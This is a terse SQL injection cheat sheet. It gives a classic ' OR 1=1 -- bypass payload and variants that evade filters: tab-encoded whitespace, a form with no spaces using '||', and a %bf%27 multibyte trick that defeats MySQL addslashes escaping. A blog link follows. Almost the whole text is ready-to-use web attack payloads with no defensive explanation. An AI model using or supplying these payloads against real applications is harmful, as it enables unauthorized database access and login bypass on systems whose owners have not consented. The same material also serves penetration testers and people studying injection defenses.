Classic payload
' OR 1 = 1 --
* Take note of the space behind —
Spaces are disallowed
'%09OR%091%09=%091%09--%09
* Use Tabs instead of whitespaces
Tabs and Spaces are disallowed
'||1=1;#
Use keywords and chars that do not require spacing
Bypass MYSQL escaping
%bf%27 or 1=1 --
http://shiflett.org/blog/2006/addslashes-versus-mysql-real-escape-string